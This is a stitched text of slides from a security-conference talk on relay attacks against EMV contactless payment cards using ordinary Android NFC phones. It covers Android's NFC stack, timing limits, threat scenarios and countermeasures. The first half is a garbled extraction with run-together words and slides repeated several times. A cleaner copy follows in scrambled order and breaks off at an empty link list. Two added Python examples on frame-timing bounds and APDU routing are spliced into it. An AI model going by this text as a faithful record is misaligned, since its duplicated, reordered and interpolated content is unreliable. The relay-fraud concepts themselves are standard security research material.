[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (V)

[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (VI)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36

Introduction to NFC (VII)

Ok So is it secure right Right

If it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)
Threat Scenarios, Scenario 1: Distributed Mafia Fraud

[Figure: a BOTMASTER coordinating several BOT devices]

Relay Attack Implementation (III)
Threat Scenarios, Scenario 2: Hiding Fraud Locations

[figure]

Relay Attack Implementation (IV)
Resistant Mechanisms

Brief summary of resistant mechanisms:
- Distance-bounding protocols: upper-bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
- Timing constraints: not enforced in current NFC-capable systems; the protocol itself allows timing extension commands
- Physical countermeasures:
  - Whitelisting/blacklisting: random UID in HCE mode → unfeasible
  - RFID blocking covers
  - Physical button/switch activation
  - Secondary authentication methods (e.g. on-card fingerprint scanners)
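A worked computation of the FWT bound quoted under Limitation 3, together with the verifier-side round-trip check that this slide says current systems do not enforce. This is an added example, not code from the slides or from the authors' relay app; the round-trip budget, the logged exchanges and the AID F0 01 02 03 04 05 06 are constructed, and the S(WTX) multiplier range 1..59 is taken from ISO/IEC 14443-4.

```python
"""Frame Waiting Time budget (ISO/IEC 14443-4) and a verifier-side round-trip check.

Added example, not from the original slides nor the authors' relay app. The FWT formula
is the one quoted on the limitations slide; the S(WTX) multiplier range 1..59 is from
ISO/IEC 14443-4; the round-trip budget and the logged exchanges are constructed.
"""
import math
from dataclasses import dataclass

FC_HZ = 13.56e6          # carrier frequency fc
FWI_MAX = 14             # 0 <= FWI <= 14
WTXM_MAX = 59            # largest multiplier an S(WTX) request may carry


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2^FWI, the card's advertised maximum response time."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * (2 ** fwi)


def fwt_table() -> dict:
    """FWI -> FWT in seconds, from about 0.3 ms (FWI=0) to about 4.95 s (FWI=14)."""
    return {fwi: fwt_seconds(fwi) for fwi in range(FWI_MAX + 1)}


def min_fwi_covering(delay_s: float):
    """Smallest FWI whose FWT already covers a given response delay (None if > FWT(14)).
    Shows how much, or how little, a card's own FWI value constrains added latency."""
    for fwi in range(FWI_MAX + 1):
        if fwt_seconds(fwi) >= delay_s:
            return fwi
    return None


def wtxm_needed(delay_s: float, fwi: int):
    """Multiplier an S(WTX) request would have to carry for a response delayed by delay_s
    under the card's FWI (temporary FWT = FWT * WTXM). None if even WTXM=59 is too short.
    This is why 'the protocol allows timing extension commands' makes FWT alone a weak bound."""
    m = max(1, math.ceil(delay_s / fwt_seconds(fwi)))
    return m if m <= WTXM_MAX else None


@dataclass
class Exchange:
    """One command/response pair as a terminal could log it (constructed)."""
    command: str    # command APDU, hex
    rtt_s: float    # measured command -> response round trip, seconds


def flag_slow_exchanges(exchanges, budget_s: float):
    """Verifier-side policy check: return the exchanges whose round trip exceeds the
    terminal's own budget. The nominal FWT is far looser than a directly tapped card
    needs, so a terminal that only honours FWT (and WTX) never notices a relay; a
    tight, empirically derived budget is the timing constraint the slide says is missing."""
    return [e for e in exchanges if e.rtt_s > budget_s]


# Constructed log: the same three commands, once tapped directly and once relayed.
# SELECT PPSE, SELECT of the constructed AID F0..06, then READ RECORD.
DIRECT_TAP = [
    Exchange("00A404000E325041592E5359532E444446303100", 0.018),
    Exchange("00A4040007F001020304050600", 0.021),
    Exchange("00B2010C00", 0.015),
]
RELAYED_TAP = [
    Exchange("00A404000E325041592E5359532E444446303100", 0.41),
    Exchange("00A4040007F001020304050600", 0.38),
    Exchange("00B2010C00", 0.45),
]
BUDGET_S = 0.1   # constructed policy threshold: well above a direct tap, well below FWT(14)

if __name__ == "__main__":
    for fwi, fwt in fwt_table().items():
        print(f"FWI={fwi:2d}  FWT={fwt * 1000:10.3f} ms")
    print("FWI needed to cover a 0.4 s relay delay:", min_fwi_covering(0.4))
    print("WTXM needed for 0.4 s under FWI=7:", wtxm_needed(0.4, 7))
    for e in flag_slow_exchanges(DIRECT_TAP + RELAYED_TAP, BUDGET_S):
        print("over budget:", e.command, f"{e.rtt_s:.3f} s")
```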


Related Work
On relay attacks

- 2005-2009: first works, built on specific hardware
- 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
- 2012-2013: relay attacks on Android accessing Secure Elements. A SE securely stores data associated with credit/debit cards. Needs a non-OTS Android device
- 2014: active relay attacks with custom hardware and custom Android firmware
- Several works studied the delay over the relay channel: relay over long distances is feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide.


Conclusions (I)

- Security of NFC is based on the physical proximity concern
- NFC threats: eavesdropping, data modification, relay attacks
- Android NFC-capable devices are rising: they can be abused to interact with cards in their proximity

Conclusions:
- Review of the Android NFC stack
- Proof-of-Concept of relay attacks using Android OTS devices
- Threat scenarios introduced
- Virtual pickpocketing attacks may appear before long


Conclusions (II)
But then, what the hell can I do? Should I run away?


Conclusions (III)

Future work
- Develop a botnet infrastructure and earn money (crossed out on the slide)
- Timing constraints of Android HCE mode
- Try active relay attacks within EMV contactless cards

Acknowledgments
- Spanish National Cybersecurity Institute (INCIBE)
- University of León under contract X43
- HITB staff

And thanks to all for hearing us!
Visit http://vwzq.net/relaynfc for more info about the project


Introduction to NFC (II)

Wow, NFC sounds pretty hipster!

Two main elements:
- Proximity Coupling Device (PCD, also NFC-capable device)
- Proximity Integrated Circuit Cards (PICC, also NFC tags)

Three operation modes:
- Peer to peer: direct communication between parties
- Read/write: communication with an NFC tag
- Card-emulation: an NFC device behaves as a tag

Introduction to NFC (III)

ISO/IEC 14443 standard: four-part international standard for contactless smartcards
1. Size, physical characteristics, etc.
2. RF power and signalling schemes (Type A & B); half-duplex, 106 kbps rate
3. Initialization + anticollision protocol
4. Data transmission protocol

IsoDep: cards compliant with the four parts. Example: contactless payment cards.

Introduction to NFC (IV)

ISO/IEC 7816: fifteen-part international standard related to contacted integrated circuit cards, especially smartcards
Application Protocol Data Units (APDUs)

Introduction to NFC (V)

[Figure taken from "13.56 MHz RFID Proximity Antennas" (http://www.nxp.com/documents/application_note/AN78010.pdf)]


Introduction to NFC (VI)

[figure]

Introduction to NFC (VII)

Ok. So, is it secure, right? Right?
If it were so secure, you would not be staring at us :)

NFC security threats:
- Eavesdropping: secure communication as solution
- Data modification (i.e. alteration, insertion or destruction): feasible in theory (but requires quite advanced RF knowledge)
- Relays: forwarding of wireless communication. Two types: passive (just forwards) or active (forwards and alters the data)

We focus on passive relay attacks.


Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
- The payment sector is quite interested in this new way of making payments
- 500M NFC payment users expected by 2019
- Almost 300 smart phones available at the moment with NFC capabilities (check http://www.nfcworld.com/nfc-phones-list)
- Most of them run Android OS

Research hypothesis: can a passive relay attack be performed in contactless payment cards using an Android NFC-capable device? If so, what are the constraints (if any exist)?


Background (I)
EMV contactless cards

- Europay, Mastercard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines
- Authenticating credit and debit card transactions
- Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)
- Application ID (AID) command

Background (II)
MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?
- Amount limit on a single transaction: up to £20 GBP, 20 €, US$50, 50 CHF, CAD$100 or AUD$100
  cof, cof (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
- Sequential contactless payments limited: it asks for the PIN
- Protected by the same fraud guarantee as standard transactions (hopefully)


Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds: Y. Desmedt (SecuriCom'88)

[Figure: P → V̄ ... communication link ... P̄ → V]
- Real-time fraud where a fraudulent prover P̄ and verifier V̄ cooperate
- Honest prover and verifier: contactless card and Point-of-Sale terminal
- Dishonest prover and verifier: two NFC-enabled Android devices


Android and NFC: A Tale of L♥ve (I)
Recap on evolution of Android NFC support

[Figure: timeline of Android NFC support, with the NFC operation modes supported at each step]
- Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight. Modes: reader/writer and peer-to-peer in software; card-emulation only in hardware
- Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B), i.e. software card-emulation, thanks to Doug Yeager
- Android 4.2 Jelly Bean (API level 17): NfcBarcode
- Android 4.4 KitKat (API level 19): software card-emulation (HCE) and NfcAdapter.ReaderCallback added

Android and NFC: A Tale of L♥ve (II)
Digging into Android NFC stack

- Event-driven framework, nice API support
- Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci
- NXP dropped in favour of NCI: open architecture not focused on a single chip family; open interface between the NFC Controller and the DH; standard proposed by the NFC Forum


Android and NFC: A Tale of L♥ve (III)
Digging into Android NFC stack: Reader/Writer mode

- Not allowed to be set directly → Android activity
- The Android NFC service selects apps according to the tag definition in the Manifest file
- At low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI), which makes communication between layers and modules easier

[Figure: path of a transceive call through the stack: User App → NFC developer framework (Tag → NfcService, mTagService.transceive) → IPC → TagService → DeviceHost.TagEndPoint, realized by NativeNfcTag → JNI doTransceive → System NFC Library (NativeNfcTag.cpp → libnfc-nci)]

Android and NFC: A Tale of L♥ve (IV)
Digging into Android NFC stack: HCE mode

- A service must be implemented to process commands and replies: the HostApduService abstract class and its processCommandApdu method
- AID-based routing service table: this means you need to declare in advance what AID you handle
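How the AID-based routing table turns a terminal's explicit SELECT (the AID command from the EMV background slide) into a service choice, which is why a HostApduService must declare in advance the AIDs it handles. This is an added example, not code from the slides or from the authors' app; the routing table is a plain dict standing in for Android's AID table (exact-AID match, as on Android 4.4), the service names and the AID F0 01 02 03 04 05 06 are constructed, and 2PAY.SYS.DDF01 is the standard EMV contactless PPSE name.

```python
"""Command-APDU parsing and AID-based dispatch as Android HCE does it.

Added example, not from the original slides nor the authors' app. The APDU layout and the
SELECT-by-name encoding follow ISO/IEC 7816-4; the routing table is a plain dict standing
in for the AID table Android builds from each HostApduService declaration (exact-AID match,
as on Android 4.4). The service names and the AID F0 01 02 03 04 05 06 are constructed;
"2PAY.SYS.DDF01" is the standard EMV contactless PPSE name.
"""
from dataclasses import dataclass
from typing import Dict, Optional

INS_SELECT = 0xA4
P1_SELECT_BY_NAME = 0x04      # SELECT by DF name, i.e. by AID


@dataclass
class CommandApdu:
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes               # command data field (empty for cases 1 and 2)
    le: Optional[int]         # expected response length, None when absent


def parse_command_apdu(raw: bytes) -> CommandApdu:
    """Parse a short-form command APDU (cases 1 to 4 of ISO/IEC 7816-4).
    Extended-length bodies (Lc encoded on three bytes) are rejected rather than guessed."""
    if len(raw) < 4:
        raise ValueError("APDU shorter than the 4-byte header")
    cla, ins, p1, p2 = raw[0], raw[1], raw[2], raw[3]
    body = raw[4:]
    if not body:                                   # case 1: header only
        return CommandApdu(cla, ins, p1, p2, b"", None)
    if len(body) == 1:                             # case 2: header + Le
        return CommandApdu(cla, ins, p1, p2, b"", body[0] or 256)
    lc = body[0]
    if lc == 0:
        raise ValueError("extended-length APDU not handled")
    data = body[1:1 + lc]
    if len(data) != lc:
        raise ValueError("Lc does not match the data length")
    tail = body[1 + lc:]
    if not tail:                                   # case 3: header + Lc + data
        return CommandApdu(cla, ins, p1, p2, data, None)
    if len(tail) == 1:                             # case 4: header + Lc + data + Le
        return CommandApdu(cla, ins, p1, p2, data, tail[0] or 256)
    raise ValueError("unexpected bytes after Le")


def select_by_name_aid(apdu: CommandApdu) -> Optional[bytes]:
    """Return the AID carried by an explicit SELECT by name, or None for any other command."""
    if apdu.ins == INS_SELECT and apdu.p1 == P1_SELECT_BY_NAME and apdu.data:
        return apdu.data
    return None


def build_select(aid: bytes) -> bytes:
    """Encode the SELECT-by-name command a terminal sends to pick an application."""
    if not 5 <= len(aid) <= 16:                    # AID length range from ISO/IEC 7816-5
        raise ValueError("AID length must be 5..16 bytes")
    return bytes([0x00, INS_SELECT, P1_SELECT_BY_NAME, 0x00, len(aid)]) + aid + b"\x00"


# Constructed routing table: registered AID -> HCE service that declared it.
AID_ROUTING_TABLE: Dict[bytes, str] = {
    b"2PAY.SYS.DDF01": "PpseService",                           # EMV PPSE name
    bytes.fromhex("F0010203040506"): "ConstructedDemoService",  # constructed AID
}


def route_select(raw: bytes, table: Dict[bytes, str] = AID_ROUTING_TABLE) -> Optional[str]:
    """Model of the HCE dispatch decision: an explicit SELECT whose AID is registered
    is routed to that service; any other command, or an unregistered or partial AID, gets
    no service. This is the 'AID must be declared in advance' limitation in one lookup."""
    aid = select_by_name_aid(parse_command_apdu(raw))
    if aid is None:
        return None
    return table.get(aid)          # exact match only


if __name__ == "__main__":
    for cmd in (build_select(b"2PAY.SYS.DDF01"),
                build_select(bytes.fromhex("F0010203040506")),
                build_select(bytes.fromhex("F001020304")),    # prefix only: not routed
                bytes.fromhex("00B2010C00")):                 # READ RECORD: not a SELECT
        print(cmd.hex().upper(), "->", route_select(cmd))
```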

Android and NFC: A Tale of L♥ve (V)
Digging into Android NFC stack: Summary

Description                                          Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)    Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)        C/C++         Manufacturer                Yes
NFC Android kernel driver                            C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)     ARM Thumb     Hardware and manufacturer   No

Some useful links:
